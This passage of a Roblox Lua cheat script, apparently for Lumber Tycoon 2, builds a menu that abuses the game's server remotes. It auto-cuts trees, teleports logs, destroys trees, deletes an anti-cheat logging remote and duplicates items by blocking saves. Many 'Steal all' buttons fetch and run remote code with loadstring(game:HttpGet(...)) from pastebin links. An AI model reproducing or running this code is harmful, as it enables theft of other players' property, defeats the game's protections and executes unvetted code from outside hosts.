  2141. for j, k in ipairs(v:GetChildren()) do
  2142. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "GreenSwampy" then
  2143. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  2144. break
  2145. end
  2146. end
  2147. end
  2148. end
  2149. Type.Text = "Zombie Tree"
  2150. end)
  2151.  
  2152. Treeaura.Name = "Tree aura"
  2153. Treeaura.Parent = WoodFrame
  2154. Treeaura.BackgroundColor3 = Color3.new(0, 0, 0)
  2155. Treeaura.BorderColor3 = Color3.new(0, 0, 0)
  2156. Treeaura.Position = UDim2.new(0, 3, 0, 187)
  2157. Treeaura.Size = UDim2.new(0, 165, 0, 20)
  2158. Treeaura.Font = Enum.Font.Fantasy
  2159. Treeaura.FontSize = Enum.FontSize.Size18
  2160. Treeaura.Text = "Tree Aura"
  2161. Treeaura.TextColor3 = Color3.new(255, 0, 0)
  2162. Treeaura.TextSize = 15
  2163. Treeaura.MouseButton1Down:connect(function()
  2164. makesound("rbxassetid://156785206")
  2165. if CutEnabled == true then
  2166. CutEnabled = false
  2167. Treeaura.Text = "Tree Aura off"
  2168. Treeaura.TextColor3 = Color3.new(255, 0, 0)
  2169. elseif CutEnabled == false then
  2170. CutEnabled = true
  2171. Treeaura.Text = "Tree Aura on"
  2172. Treeaura.TextColor3 = Color3.new(0, 1, 0)
  2173. end
  2174. end)
  2175. --Credits to Johiro
  2176.  
  2177. local function GetAxe() --Gets your current axe thats equiped when called
  2178. if game.Players.LocalPlayer.Character:FindFirstChild("Tool") then
  2179. return game.Players.LocalPlayer.Character.Tool --returns the axe when found
  2180. else
  2181. return false --returns false when not equiped
  2182. end
  2183. end
  2184.  
  2185. local function GetDamage(Axe, TreeClass)-- Gets the right Damage of the axe and returns it if called to prevent killing yourself like gold axe
  2186. if Axe.ToolTip == "Basic Hatchet" then return 0.2
  2187. elseif Axe.ToolTip == "Plain Axe" then return 0.55
  2188. elseif Axe.ToolTip == "Steel Axe" then return 0.93
  2189. elseif Axe.ToolTip == "Hardened Axe" then return 1.45
  2190. elseif Axe.ToolTip == "Silver Axe" then return 1.6
  2191. elseif Axe.ToolTip == "Rukiryaxe" then return 1.68
  2192. elseif Axe.ToolTip == "Beta Axe of Bosses" then return 1.45
  2193. elseif Axe.ToolTip == "Alpha Axe of Testing" then return 1.5
  2194. elseif Axe.ToolTip == "Fire Axe" then
  2195. if TreeClass ~= "Volcano" then return 0.6 else return 6.35 end
  2196. elseif Axe.ToolTip == "End Times Axe" then
  2197. if TreeClass ~= "LoneCave" then return 1.58 else return 10000000 end
  2198. elseif Axe.ToolTip == "Candy Cane Axe" then return 0
  2199. elseif Axe.ToolTip == "Johiro" then return 1.8
  2200. elseif Axe.ToolTip == "Beesaxe" then return 1.4
  2201. elseif Axe.ToolTip == "CHICKEN AXE" then return 0.9
  2202. elseif Axe.ToolTip == "Amber Axe" then return 3.39
  2203. elseif Axe.ToolTip == "The Many Axe" then return 10.2
  2204. elseif Axe.ToolTip == "Gingerbread Axe" then
  2205. if TreeClass == "Walnut" then return 8.5
  2206. elseif TreeClass == "Koa" then return 11 else return 1.2 end
  2207. elseif Axe.ToolTip == "Bird Axe" then
  2208. if TreeClass == "Volcano" then return 2.5 elseif TreeClass == "CaveCrawler" then return 3.9 else return 1.65 end
  2209. end
  2210. end
  2211.  
  2212. TreeList = {} --Creates a table of the trees
  2213. for a,b in pairs(workspace:GetChildren()) do
  2214. if b.name == "TreeRegion" then
  2215. b.ChildAdded:Connect(function(NewTree)--Creates functions that Adds new trees to the list
  2216. table.insert(TreeList, NewTree)
  2217. end)
  2218. for c,d in pairs(b:GetChildren()) do-- Adds the trees when first time starting the script
  2219. if d.Name == "Model" then
  2220. table.insert(TreeList, d)
  2221. end
  2222. end
  2223. end
  2224. end
  2225.  
  2226. local function CutTree(Tree) --Cuts the tree when called with the tree you want to cut
  2227. if GetAxe() ~= false then --checks if you have a axe equiped
  2228. Damage = GetDamage(GetAxe(), Tree.TreeClass.Value) --gets the Damage
  2229. local CutArguments = {
  2230. sectionId = 1,
  2231. faceVector = Vector3.new(0,0,-1),
  2232. height = 0.5,
  2233. hitPoints = Damage,
  2234. cooldown = 0,
  2235. cuttingClass = "Axe",
  2236. tool = GetAxe()
  2237. }
  2238. for i=1, 50 do
  2239. game.ReplicatedStorage.Interaction.RemoteProxy:FireServer(Tree.CutEvent, CutArguments)
  2240. end
  2241. end
  2242. end
  2243.  
  2244. spawn(function() --used spawn so it wont interrupt any of the other things
  2245. CutEnabled = false
  2246. while wait(.5) do --Main loop to do the stuff
  2247. if CutEnabled == true then
  2248. if GetAxe() ~= false then --Checks if you have a axe equiped
  2249. for a,b in pairs(TreeList) do
  2250. if not b:FindFirstChild("RootCut") and b:FindFirstChild("CutEvent") then --Checks if the tree is already cut
  2251. distance = (game.Players.LocalPlayer.Character.Head.Position - b.WoodSection.Position).magnitude --gets the distance between player and tree
  2252. if distance < 225 then --if distance lower than 225 then it will cut the tree
  2253. CutTree(b) --Calls the function with the tree to cut
  2254. end
  2255. else
  2256. table.remove(TreeList, a)--if tree already cut then it gets removed from the list
  2257. end
  2258. end
  2259. end
  2260. end
  2261. end
  2262. end)
  2263.  
  2264. BigPlank.Name = "BigPlank"
  2265. BigPlank.Parent = WoodFrame
  2266. BigPlank.BackgroundColor3 = Color3.new(0, 0, 0)
  2267. BigPlank.BorderColor3 = Color3.new(0, 0, 0)
  2268. BigPlank.Position = UDim2.new(0, 3, 0, 210)
  2269. BigPlank.Size = UDim2.new(0, 165, 0, 20)
  2270. BigPlank.Font = Enum.Font.Fantasy
  2271. BigPlank.FontSize = Enum.FontSize.Size18
  2272. BigPlank.Text = "Mod Wood"
  2273. BigPlank.TextColor3 = Color3.new(255, 0, 0)
  2274. BigPlank.TextSize = 15
  2275. BigPlank.MouseButton1Down:connect(function()
  2276. makesound("rbxassetid://156785206")
  2277. for _, Log in pairs(workspace.LogModels:GetChildren()) do
  2278. if Log.Name:sub(1, 6) == "Loose_" and Log:findFirstChild("Owner") then
  2279. if Log.Owner.Value == game.Players.LocalPlayer then
  2280. for i,v in pairs(Log:GetChildren()) do
  2281. if v.Name=="WoodSection" then
  2282. spawn(function()
  2283. for i=1,10 do
  2284. wait()
  2285. v.CFrame=CFrame.new(Vector3.new(315, -0.296, 85.791))*CFrame.Angles(math.rad(90),0,0)
  2286. end
  2287. end)
  2288. end
  2289. end
  2290. spawn(function()
  2291. for i=1,20 do
  2292. wait()
  2293. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Log.WoodSection)
  2294. game.ReplicatedStorage.Interaction.ClientRequestOwnership:FireServer(Log.WoodSection)
  2295. end
  2296. end)
  2297. end
  2298. end
  2299. end
  2300. wait(2.0)
  2301. for _, Log in pairs(game.Workspace.LogModels:GetChildren()) do
  2302. if Log.Name:sub(1, 6) == "Loose_" and Log:findFirstChild("Owner") then
  2303. if Log.Owner.Value == game.Players.LocalPlayer then
  2304. Log:MoveTo(game.Players.LocalPlayer.Character.HumanoidRootPart.Position)
  2305. for i=1,20 do
  2306. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Log.WoodSection)
  2307. game.ReplicatedStorage.Interaction.ClientRequestOwnership:FireServer(Log.WoodSection)
  2308. end
  2309. end
  2310. end
  2311. end
  2312.  
  2313. SawmillC = false
  2314. Mouse = game.Players.LocalPlayer:GetMouse()
  2315.  
  2316. Mouse.KeyDown:connect(function(key)
  2317. if key:lower() == "p" then
  2318. Treee = Mouse.Target
  2319. end
  2320. end)
  2321. Mouse.KeyDown:connect(function(key)
  2322. if key:lower() == "m" then
  2323. if Mouse.Target.Parent:FindFirstChild("BlockageAlert") then
  2324. Sawmill = Mouse.Target.Parent
  2325. else
  2326. Sawmill=Mouse.Target.Parent.Parent
  2327. end
  2328. if Sawmill:FindFirstChild("BlockageAlert") and Sawmill:FindFirstChild("Owner") then
  2329. SawmillC = true
  2330. else
  2331. SawmillC = false
  2332. print"Something went wrong while setting the sawmill!"
  2333. end
  2334. if Treee ~= nil then
  2335. Mod(Treee)
  2336. else
  2337. print("Select tree with 'p!")
  2338. end
  2339. end
  2340. end)
  2341.  
  2342. function Mod(SelectedPart)
  2343. if SawmillC ~= true then
  2344. print'Set the sawmill with "m"!'
  2345. return
  2346. end
  2347. if SelectedPart.Parent:FindFirstChild("TreeClass") and SelectedPart.Parent:FindFirstChild("Owner") then
  2348. print("Tree: "..SelectedPart.Parent.TreeClass.Value)
  2349. Tree = SelectedPart.Parent
  2350. Tree.PrimaryPart = SelectedPart
  2351. game.ReplicatedStorage.Interaction.Verify:FireServer('Item owned by player',Tree)
  2352. Tree:SetPrimaryPartCFrame(Sawmill.Particles.CFrame)
  2353. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Tree)
  2354. end
  2355. end
  2356. end)
  2357.  
  2358. RemoveT.Name = "RemoveT"
  2359. RemoveT.Parent = WoodFrame
  2360. RemoveT.BackgroundColor3 = Color3.new(0, 0, 0)
  2361. RemoveT.BorderColor3 = Color3.new(0, 0, 0)
  2362. RemoveT.Position = UDim2.new(0, 3, 0, 233)
  2363. RemoveT.Size = UDim2.new(0, 165, 0, 20)
  2364. RemoveT.Font = Enum.Font.Fantasy
  2365. RemoveT.FontSize = Enum.FontSize.Size18
  2366. RemoveT.Text = "Remove Trees"
  2367. RemoveT.TextColor3 = Color3.new(255, 0, 0)
  2368. RemoveT.TextSize = 15
  2369. RemoveT.MouseButton1Down:connect(function()
  2370. makesound("rbxassetid://156785206")
  2371. RemoveT.BackgroundColor3 = Color3.new(0, 0, 0)
  2372. RemoveT.TextColor3 = Color3.new(0, 1, 0)
  2373. for i,v in pairs(game.Workspace:GetDescendants()) do
  2374. if v.Name == "WoodSection" and v.Parent:FindFirstChild("CutEvent") then
  2375. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(v.Parent)
  2376. game.ReplicatedStorage.Interaction.DestroyStructure:FireServer(v.Parent)
  2377. end
  2378. end
  2379. game.Workspace.DescendantAdded:connect(function(Thing)
  2380. wait(0.1)
  2381. if Thing.Name == "WoodSection" and Thing.Parent:FindFirstChild("CutEvent") then
  2382. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Thing.Parent)
  2383. game.ReplicatedStorage.Interaction.DestroyStructure:FireServer(Thing.Parent)
  2384. end
  2385. end)
  2386. end)
  2387.  
  2388. Copymenu.Name = "Copymenu"
  2389. Copymenu.Parent = Picker
  2390. Copymenu.BackgroundColor3 = Color3.new(1, 1, 1)
  2391. Copymenu.BorderColor3 = Color3.new(0, 0, 0)
  2392. Copymenu.Position = UDim2.new(0, 15, 0,260)
  2393. Copymenu.Size = UDim2.new(0, 80, 0, 80)
  2394. Copymenu.ZIndex = 3
  2395. Copymenu.Image = "rbxassetid://3899462163"
  2396. Copymenu.ScaleType = Enum.ScaleType.Crop
  2397. Copymenu.MouseButton1Click:Connect(function()
  2398. CurrentItem.Image = "rbxassetid://3886256996"
  2399. makesound("rbxassetid://156785206")
  2400. AIntroImage.Visible = false
  2401. AIntroImage1.Visible = false
  2402. end)
  2403.  
  2404. CopyFrame.Name = "CopyFrame"
  2405. CopyFrame.Parent = MenuFrame
  2406. CopyFrame.BorderSizePixel = 1
  2407. CopyFrame.BackgroundTransparency = 0
  2408. CopyFrame.BorderColor3 = Color3.new(0, 0, 0)
  2409. CopyFrame.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  2410. CopyFrame.Size = UDim2.new(0, 170, 0, 439)
  2411. CopyFrame.Visible = false
  2412.  
  2413. PlayerNameBox.Name = "PlayerNameBox"
  2414. PlayerNameBox.Parent = CopyFrame
  2415. PlayerNameBox.BackgroundColor3 = Color3.new(0, 0, 0)
  2416. PlayerNameBox.BorderColor3 = Color3.new(0, 0, 0)
  2417. PlayerNameBox.Position = UDim2.new(0, 3, 0, 3)
  2418. PlayerNameBox.Size = UDim2.new(0, 165, 0, 20)
  2419. PlayerNameBox.Font = Enum.Font.Fantasy
  2420. PlayerNameBox.FontSize = Enum.FontSize.Size18
  2421. PlayerNameBox.Text = "PLAYER NAME"
  2422. PlayerNameBox.TextColor3 = Color3.new(255, 0, 0)
  2423. PlayerNameBox.TextSize = 15
  2424.  
  2425. AXETRUCK.Name = "AXETRUCK"
  2426. AXETRUCK.Parent = CopyFrame
  2427. AXETRUCK.BackgroundColor3 = Color3.new(0, 0, 0)
  2428. AXETRUCK.BorderSizePixel = 1
  2429. AXETRUCK.BorderColor3 = Color3.fromRGB(196, 40, 28)
  2430. AXETRUCK.Position = UDim2.new(0,175, 0, 3)
  2431. AXETRUCK.Size = UDim2.new(0, 165, 0, 20)
  2432. AXETRUCK.Font = Enum.Font.Fantasy
  2433. AXETRUCK.FontSize = Enum.FontSize.Size18
  2434. AXETRUCK.Text = "Axe + Truck S/Port"
  2435. AXETRUCK.TextColor3 = Color3.new(255, 0, 0)
  2436. AXETRUCK.TextSize = 15
  2437. AXETRUCK.MouseButton1Down:connect(function()
  2438. makesound("rbxassetid://156785206")
  2439. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2440. wait(2.5)
  2441. MainFrame.Visible = false
  2442. OpenFrame.Visible = true
  2443. loadstring(game:HttpGet('https://pastebin.com/raw/TYUpEE2R',true))()
  2444. end)
  2445.  
  2446. WireObjects.Name = "WireObjects"
  2447. WireObjects.Parent = CopyFrame
  2448. WireObjects.BackgroundColor3 = Color3.new(0, 0, 0)
  2449. WireObjects.BorderSizePixel = 1
  2450. WireObjects.BorderColor3 = Color3.fromRGB(196, 40, 28)
  2451. WireObjects.Position = UDim2.new(0,175, 0, 26)
  2452. WireObjects.Size = UDim2.new(0, 165, 0, 20)
  2453. WireObjects.Font = Enum.Font.Fantasy
  2454. WireObjects.FontSize = Enum.FontSize.Size18
  2455. WireObjects.Text = "Wire Objects S/Port"
  2456. WireObjects.TextColor3 = Color3.new(255, 0, 0)
  2457. WireObjects.TextSize = 15
  2458. WireObjects.MouseButton1Down:connect(function()
  2459. makesound("rbxassetid://156785206")
  2460. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2461. wait(2.5)
  2462. MainFrame.Visible = false
  2463. OpenFrame.Visible = true
  2464. loadstring(game:HttpGet('https://pastebin.com/raw/hf5D029M',true))()
  2465. end)
  2466.  
  2467. giftsport.Name = "giftsport"
  2468. giftsport.Parent = CopyFrame
  2469. giftsport.BackgroundColor3 = Color3.new(0, 0, 0)
  2470. giftsport.BorderSizePixel = 1
  2471. giftsport.BorderColor3 = Color3.fromRGB(196, 40, 28)
  2472. giftsport.Position = UDim2.new(0,175, 0, 49)
  2473. giftsport.Size = UDim2.new(0, 165, 0, 20)
  2474. giftsport.Font = Enum.Font.Fantasy
  2475. giftsport.FontSize = Enum.FontSize.Size18
  2476. giftsport.Text = "Gifts S/Port"
  2477. giftsport.TextColor3 = Color3.new(255, 0, 0)
  2478. giftsport.TextSize = 15
  2479. giftsport.MouseButton1Down:connect(function()
  2480. makesound("rbxassetid://156785206")
  2481. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2482. wait(2.5)
  2483. MainFrame.Visible = false
  2484. OpenFrame.Visible = true
  2485. loadstring(game:HttpGet('https://pastebin.com/raw/br15QAkw',true))()
  2486. end)
  2487.  
  2488. HardStructures.Name = "HardStructures"
  2489. HardStructures.Parent = CopyFrame
  2490. HardStructures.BackgroundColor3 = Color3.new(0, 0, 0)
  2491. HardStructures.BorderSizePixel = 1
  2492. HardStructures.BorderColor3 = Color3.fromRGB(196, 40, 28)
  2493. HardStructures.Position = UDim2.new(0,175, 0, 72)
  2494. HardStructures.Size = UDim2.new(0, 165, 0, 20)
  2495. HardStructures.Font = Enum.Font.Fantasy
  2496. HardStructures.FontSize = Enum.FontSize.Size18
  2497. HardStructures.Text = "Glass + Conveyors S/Port"
  2498. HardStructures.TextColor3 = Color3.new(255, 0, 0)
  2499. HardStructures.TextSize = 15
  2500. HardStructures.MouseButton1Down:connect(function()
  2501. makesound("rbxassetid://156785206")
  2502. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2503. wait(2.5)
  2504. MainFrame.Visible = false
  2505. OpenFrame.Visible = true
  2506. loadstring(game:HttpGet('https://pastebin.com/raw/sxGrqwEZ',true))()
  2507. end)
  2508.  
  2509. other.Name = "other"
  2510. other.Parent = CopyFrame
  2511. other.BackgroundColor3 = Color3.new(0, 0, 0)
  2512. other.BorderSizePixel = 1
  2513. other.BorderColor3 = Color3.fromRGB(196, 40, 28)
  2514. other.Position = UDim2.new(0,175, 0, 95)
  2515. other.Size = UDim2.new(0, 165, 0, 20)
  2516. other.Font = Enum.Font.Fantasy
  2517. other.FontSize = Enum.FontSize.Size18
  2518. other.Text = "Other S/Port"
  2519. other.TextColor3 = Color3.new(255, 0, 0)
  2520. other.TextSize = 15
  2521. other.MouseButton1Down:connect(function()
  2522. makesound("rbxassetid://156785206")
  2523. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2524. wait(2.5)
  2525. MainFrame.Visible = false
  2526. OpenFrame.Visible = true
  2527. loadstring(game:HttpGet('https://pastebin.com/raw/e3MCdFDF',true))()
  2528. end)
  2529.  
  2530.  
  2531. Paintingf.Name = "Paintingf"
  2532. Paintingf.Parent = CopyFrame
  2533. Paintingf.BackgroundColor3 = Color3.new(0, 0, 0)
  2534. Paintingf.BorderSizePixel = 1
  2535. Paintingf.BorderColor3 = Color3.fromRGB(196, 40, 28)
  2536. Paintingf.Position = UDim2.new(0, 175, 0, 118)
  2537. Paintingf.Size = UDim2.new(0, 165, 0, 20)
  2538. Paintingf.Font = Enum.Font.Fantasy
  2539. Paintingf.FontSize = Enum.FontSize.Size18
  2540. Paintingf.Text = "Painting + Furn S/Port"
  2541. Paintingf.TextColor3 = Color3.new(255, 0, 0)
  2542. Paintingf.TextSize = 15
  2543. Paintingf.MouseButton1Down:connect(function()
  2544. makesound("rbxassetid://156785206")
  2545. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2546. wait(2.5)
  2547. MainFrame.Visible = false
  2548. OpenFrame.Visible = true
  2549. loadstring(game:HttpGet('https://pastebin.com/raw/qw5Vqh62',true))()
  2550. end)
  2551.  
  2552. TPtreesPlanks.Name = "Tree aura"
  2553. TPtreesPlanks.Parent = CopyFrame
  2554. TPtreesPlanks.BackgroundColor3 = Color3.new(0, 0, 0)
  2555. TPtreesPlanks.BorderSizePixel = 1
  2556. TPtreesPlanks.BorderColor3 = Color3.fromRGB(196, 40, 28)
  2557. TPtreesPlanks.Position = UDim2.new(0, 175, 0, 141)
  2558. TPtreesPlanks.Size = UDim2.new(0, 165, 0, 20)
  2559. TPtreesPlanks.Font = Enum.Font.Fantasy
  2560. TPtreesPlanks.FontSize = Enum.FontSize.Size18
  2561. TPtreesPlanks.Text = "Plank S/Port"
  2562. TPtreesPlanks.TextColor3 = Color3.new(255, 0, 0)
  2563. TPtreesPlanks.TextSize = 15
  2564. TPtreesPlanks.MouseButton1Down:connect(function()
  2565. makesound("rbxassetid://156785206")
  2566. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2567. wait(2.5)
  2568. MainFrame.Visible = false
  2569. OpenFrame.Visible = true
  2570. loadstring(game:HttpGet('https://pastebin.com/raw/uQEpKgLN',true))()
  2571. end)
  2572.  
  2573. CopyBase.Name = "CopyBase"
  2574. CopyBase.Parent = CopyFrame
  2575. CopyBase.BackgroundColor3 = Color3.new(0, 0, 0)
  2576. CopyBase.BorderColor3 = Color3.new(0, 0, 0)
  2577. CopyBase.Position = UDim2.new(0, 3, 0, 26)
  2578. CopyBase.Size = UDim2.new(0, 165, 0, 20)
  2579. CopyBase.Font = Enum.Font.Fantasy
  2580. CopyBase.FontSize = Enum.FontSize.Size18
  2581. CopyBase.Text = "Copy Base"
  2582. CopyBase.TextColor3 = Color3.new(255, 0, 0)
  2583. CopyBase.TextSize = 15
  2584. CopyBase.MouseButton1Down:connect(function()
  2585. makesound("rbxassetid://156785206")
  2586. loadstring(game:HttpGet('https://pastebin.com/raw/p9mWDwFv',true))()
  2587. end)
  2588.  
  2589.  
  2590. ItemDupe.Name = "ItemDupe"
  2591. ItemDupe.Parent = CopyFrame
  2592. ItemDupe.BackgroundColor3 = Color3.new(0, 0, 0)
  2593. ItemDupe.BorderColor3 = Color3.new(0, 0, 0)
  2594. ItemDupe.Position = UDim2.new(0, 3, 0, 49)
  2595. ItemDupe.Size = UDim2.new(0, 165, 0, 20)
  2596. ItemDupe.Font = Enum.Font.Fantasy
  2597. ItemDupe.FontSize = Enum.FontSize.Size18
  2598. ItemDupe.Text = "Dupe Mode"
  2599. ItemDupe.TextColor3 = Color3.new(255, 0, 0)
  2600. ItemDupe.TextSize = 15
  2601. ItemDupe.MouseButton1Down:connect(function()
  2602. makesound("rbxassetid://156785206")
  2603. --Functions, look here for the source and how it works if you want to know, also give me credits if you skid xD
  2604.  
  2605. --Prevent the game to kick you by letting the script error by not fincing the remote
  2606. if game.ReplicatedStorage.Transactions:FindFirstChild("AddLog") then
  2607. game.ReplicatedStorage.Transactions.AddLog:Destroy()
  2608. end
  2609.  
  2610. --Button function (toggle)
  2611. local Enabled = false
  2612. ItemDupe.MouseButton1Down:Connect(function()
  2613. if Enabled == true then
  2614. Enabled = false
  2615. ItemDupe.Text = "Dupe Mode: Disabled"
  2616. elseif Enabled == false then
  2617. Enabled = true
  2618. ItemDupe.Text = "Dupe Mode: Enabled"
  2619. end
  2620. end)
  2621.  
  2622.  
  2623. --Changes slot to -1 when Enabled to prevent saving
  2624. while wait(.25) do
  2625. if Enabled == true then
  2626. game.Players.LocalPlayer.CurrentSaveSlot.Value = -1
  2627. end
  2628. end
  2629.  
  2630. --Credits to Johiro
  2631. end)
  2632.  
  2633. GetWood.Name = "GetWood"
  2634. GetWood.Parent = CopyFrame
  2635. GetWood.BackgroundColor3 = Color3.new(0, 0, 0)
  2636. GetWood.BorderColor3 = Color3.new(0, 0, 0)
  2637. GetWood.Position = UDim2.new(0, 3, 0, 72)
  2638. GetWood.Size = UDim2.new(0, 165, 0, 20)
  2639. GetWood.Font = Enum.Font.Fantasy
  2640. GetWood.FontSize = Enum.FontSize.Size18
  2641. GetWood.Text = "Steal all Wood"
  2642. GetWood.TextColor3 = Color3.new(255, 0, 0)
  2643. GetWood.TextSize = 15
  2644. GetWood.MouseButton1Down:connect(function()
  2645. makesound("rbxassetid://156785206")
  2646. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2647. wait(2.5)
  2648. MainFrame.Visible = false
  2649. OpenFrame.Visible = true
  2650. loadstring(game:HttpGet('https://pastebin.com/raw/uKAXDx1d',true))()
  2651. end)
  2652.  
  2653. GetItems.Name = "GetItems"
  2654. GetItems.Parent = CopyFrame
  2655. GetItems.BackgroundColor3 = Color3.new(0, 0, 0)
  2656. GetItems.BorderColor3 = Color3.new(0, 0, 0)
  2657. GetItems.Position = UDim2.new(0, 3, 0, 95)
  2658. GetItems.Size = UDim2.new(0, 165, 0, 20)
  2659. GetItems.Font = Enum.Font.Fantasy
  2660. GetItems.FontSize = Enum.FontSize.Size18
  2661. GetItems.Text = "Steal all Items"
  2662. GetItems.TextColor3 = Color3.new(255, 0, 0)
  2663. GetItems.TextSize = 15
  2664. GetItems.MouseButton1Down:connect(function()
  2665. makesound("rbxassetid://156785206")
  2666. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2667. wait(2.5)
  2668. MainFrame.Visible = false
  2669. OpenFrame.Visible = true
  2670. loadstring(game:HttpGet('https://pastebin.com/raw/qbZbq6Bi',true))()
  2671. end)
  2672.  
  2673. GetAxes.Name = "GetAxes"
  2674. GetAxes.Parent = CopyFrame
  2675. GetAxes.BackgroundColor3 = Color3.new(0, 0, 0)
  2676. GetAxes.BorderColor3 = Color3.new(0, 0, 0)
  2677. GetAxes.Position = UDim2.new(0, 3, 0, 118)
  2678. GetAxes.Size = UDim2.new(0, 165, 0, 20)
  2679. GetAxes.Font = Enum.Font.Fantasy
  2680. GetAxes.FontSize = Enum.FontSize.Size18
  2681. GetAxes.Text = "Steal all Axes"
  2682. GetAxes.TextColor3 = Color3.new(255, 0, 0)
  2683. GetAxes.TextSize = 15
  2684. GetAxes.MouseButton1Down:connect(function()
  2685. makesound("rbxassetid://156785206")
  2686. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2687. wait(2.5)
  2688. MainFrame.Visible = false
  2689. OpenFrame.Visible = true
  2690. loadstring(game:HttpGet('https://pastebin.com/raw/y61fFyKY',true))()
  2691. end)
  2692.  
  2693.  
  2694. GetGifts.Name = "GetGifts"
  2695. GetGifts.Parent = CopyFrame
  2696. GetGifts.BackgroundColor3 = Color3.new(0, 0, 0)
  2697. GetGifts.BorderColor3 = Color3.new(0, 0, 0)
  2698. GetGifts.Position = UDim2.new(0, 3, 0, 141)
  2699. GetGifts.Size = UDim2.new(0, 165, 0, 20)
  2700. GetGifts.Font = Enum.Font.Fantasy
  2701. GetGifts.FontSize = Enum.FontSize.Size18
  2702. GetGifts.Text = "Steal all Gifts"
  2703. GetGifts.TextColor3 = Color3.new(255, 0, 0)
  2704. GetGifts.TextSize = 15
  2705. GetGifts.MouseButton1Down:connect(function()
  2706. makesound("rbxassetid://156785206")
  2707. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2708. wait(2.5)
  2709. MainFrame.Visible = false
  2710. OpenFrame.Visible = true
  2711. loadstring(game:HttpGet('https://pastebin.com/raw/QSADN8bJ',true))()
  2712. end)
  2713.  
  2714.  
  2715.  
  2716. GetStructure.Name = "GetStructure"
  2717. GetStructure.Parent = CopyFrame
  2718. GetStructure.BackgroundColor3 = Color3.new(0, 0, 0)
  2719. GetStructure.BorderColor3 = Color3.new(0, 0, 0)
  2720. GetStructure.Position = UDim2.new(0, 3, 0, 164)
  2721. GetStructure.Size = UDim2.new(0, 165, 0, 20)
  2722. GetStructure.Font = Enum.Font.Fantasy
  2723. GetStructure.FontSize = Enum.FontSize.Size18
  2724. GetStructure.Text = "Steal all Structures"
  2725. GetStructure.TextColor3 = Color3.new(255, 0, 0)
  2726. GetStructure.TextSize = 15
  2727. GetStructure.MouseButton1Down:connect(function()
  2728. makesound("rbxassetid://156785206")
  2729. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2730. wait(2.5)
  2731. MainFrame.Visible = false
  2732. OpenFrame.Visible = true
  2733. loadstring(game:HttpGet('https://pastebin.com/raw/TtxVVGAn',true))()
  2734. end)
  2735.  
  2736. GetFurniture.Name = "GetFurniture"
  2737. GetFurniture.Parent = CopyFrame
  2738. GetFurniture.BackgroundColor3 = Color3.new(0, 0, 0)
  2739. GetFurniture.BorderColor3 = Color3.new(0, 0, 0)
  2740. GetFurniture.Position = UDim2.new(0, 3, 0, 187)
  2741. GetFurniture.Size = UDim2.new(0, 165, 0, 20)
  2742. GetFurniture.Font = Enum.Font.Fantasy
  2743. GetFurniture.FontSize = Enum.FontSize.Size18
  2744. GetFurniture.Text = "Steal all Furniture"
  2745. GetFurniture.TextColor3 = Color3.new(255, 0, 0)
  2746. GetFurniture.TextSize = 15
  2747. GetFurniture.MouseButton1Down:connect(function()
  2748. makesound("rbxassetid://156785206")
  2749. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2750. wait(2.5)
  2751. MainFrame.Visible = false
  2752. OpenFrame.Visible = true
  2753. loadstring(game:HttpGet('https://pastebin.com/raw/iQujeNTN',true))()
  2754. end)
  2755.  
  2756.  
  2757. GetVehicle.Name = "GetVehicle"
  2758. GetVehicle.Parent = CopyFrame
  2759. GetVehicle.BackgroundColor3 = Color3.new(0, 0, 0)
  2760. GetVehicle.BorderColor3 = Color3.new(0, 0, 0)
  2761. GetVehicle.Position = UDim2.new(0, 3, 0, 210)
  2762. GetVehicle.Size = UDim2.new(0, 165, 0, 20)
  2763. GetVehicle.Font = Enum.Font.Fantasy
  2764. GetVehicle.FontSize = Enum.FontSize.Size18
  2765. GetVehicle.Text = "Steal all Box Vehicles"
  2766. GetVehicle.TextColor3 = Color3.new(255, 0, 0)
  2767. GetVehicle.TextSize = 15
  2768. GetVehicle.MouseButton1Down:connect(function()
  2769. makesound("rbxassetid://156785206")
  2770. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2771. wait(2.5)
  2772. MainFrame.Visible = false
  2773. OpenFrame.Visible = true
  2774. loadstring(game:HttpGet('https://pastebin.com/raw/D0z4jG6d',true))()
  2775. end)
  2776.  
  2777.  
  2778. GetWires.Name = "GetWires"
  2779. GetWires.Parent = CopyFrame
  2780. GetWires.BackgroundColor3 = Color3.new(0, 0, 0)
  2781. GetWires.BorderColor3 = Color3.new(0, 0, 0)
  2782. GetWires.Position = UDim2.new(0, 3, 0, 233)
  2783. GetWires.Size = UDim2.new(0, 165, 0, 20)
  2784. GetWires.Font = Enum.Font.Fantasy
  2785. GetWires.FontSize = Enum.FontSize.Size18
  2786. GetWires.Text = "Steal all Wires"
  2787. GetWires.TextColor3 = Color3.new(255, 0, 0)
  2788. GetWires.TextSize = 15
  2789. GetWires.MouseButton1Down:connect(function()
  2790. makesound("rbxassetid://156785206")
  2791. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2792. wait(2.5)
  2793. MainFrame.Visible = false
